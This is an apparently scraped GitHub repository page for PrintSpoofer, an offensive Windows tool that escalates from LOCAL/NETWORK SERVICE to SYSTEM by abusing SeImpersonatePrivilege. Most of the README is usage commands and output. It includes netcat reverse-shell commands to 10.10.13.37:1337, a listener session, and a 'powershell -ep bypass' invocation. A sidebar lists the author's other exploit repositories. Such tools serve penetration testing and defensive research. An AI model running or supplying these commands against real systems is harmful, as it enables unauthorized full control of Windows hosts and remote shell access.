itm4n/PrintSpoofer itm4n/PrintSpoofer

  • Stars
    star
    1,514
  • Rank 29,760 (Top 0.7 %)
  • Language
    C
  • Created about 4 years ago
  • Updated over 3 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
itm4n/PrintSpoofer
github

itm4n

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Abusing Impersonation Privileges on Windows 10 and Server 2019

PrintSpoofer

From LOCAL/NETWORK SERVICE to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 and Server 2016/2019.

For more information: https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/.

Usage

You can check the help message using the -h option.

C:\TOOLS>PrintSpoofer.exe -h

PrintSpoofer v0.1 (by @itm4n)

  Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print
  Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser()

Arguments:
  -c <CMD>    Execute the command *CMD*
  -i          Interact with the new process in the current command prompt (default is non-interactive)
  -d <ID>     Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta)
  -h          That's me :)

Examples:
  - Run PowerShell as SYSTEM in the current console
      PrintSpoofer.exe -i -c powershell.exe
  - Spawn a SYSTEM command prompt on the desktop of the session 1
      PrintSpoofer.exe -d 1 -c cmd.exe
  - Get a SYSTEM reverse shell
      PrintSpoofer.exe -c "c:\Temp\nc.exe 10.10.13.37 1337 -e cmd"

Usage 1: Spawn a SYSTEM process and interact with it

If you have an interactive shell, you can create a new SYSTEM process in your current console.

Use case: bind shell, reverse shell, psexec.py, etc.

C:\TOOLS>PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19613.1000]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\system

Usage 2: Spawn a SYSTEM process and exit

If you can execute commands but you don't have an interactive shell, you can create a new SYSTEM process and exit immediately without interacting with it.

Use case: WinRM, WebShell, wmiexec.py, smbexec.py, etc.

Create a reverse shell:

C:\TOOLS>PrintSpoofer.exe -c "C:\TOOLS\nc.exe 10.10.13.37 1337 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK

Netcat listener:

C:\TOOLS>nc.exe -l -p 1337
Microsoft Windows [Version 10.0.19613.1000]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\system

Usage 3: Spawn a SYSTEM process on a desktop

If you are logged on locally or via RDP (including VDI), you can spawn a SYSTEM command prompt on your desktop. First, check your session ID with the command qwinsta and then specify this value with the option -d.

Use case: Terminal Session (RDP), VDI

C:\TOOLS>qwinsta
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 services                                    0  Disc
 console           Administrator             1  Active
>rdp-tcp#3         lab-user                  3  Active
 rdp-tcp                                 65536  Listen

C:\TOOLS>PrintSpoofer.exe -d 3 -c "powershell -ep bypass"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK

More Repositories

1

PrivescCheck

Privilege Escalation Enumeration Script for Windows
PowerShell
2,184
star
2

VBA-RunPE

A VBA implementation of the RunPE technique or how to bypass application whitelisting.
VBA
763
star
3

PPLdump

Dump the memory of a PPL with a userland exploit
C
756
star
4

Perfusion

Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)
C++
402
star
5

UsoDllLoader

Windows - Weaponizing privileged file writes with the Update Session Orchestrator service
C++
365
star
6

FullPowers

Recover the default privilege set of a LOCAL/NETWORK SERVICE account
C++
324
star
7

PPLmedic

Dump the memory of any PPL with a Userland exploit chain
C++
288
star
8

PPLcontrol

Controlling Windows PP(L)s
C++
139
star
9

BitsArbitraryFileMove

Microsoft Windows BITS Arbitrary File Move Local Privilege Escalation
C++
113
star
10

CDPSvcDllHijacking

Windows 10 CDPSvc DLL Hijacking - From LOCAL SERVICE to SYSTEM
C++
111
star
11

SysTracingPoc

CVE-2020-0668 - Microsoft Windows Service Tracing Arbitrary File Move Local Privilege Escalation Vulnerability
C++
107
star
12

Pentest-Windows

Windows internals and exploitation tricks
C++
81
star
13

Pentest-Tools

Some random tools I use for penetration testing
HTML
77
star
14

DiagTrackAribtraryFileRead

Microsoft Windows DiagTrack 'UtcApi_DownloadLatestSettings' Arbitrary File Read
C
37
star
15

CVEs

Random CVEs
C++
18
star
16

itm4n

5
star
17

itm4n.github.io

Personal blog
Ruby
2
star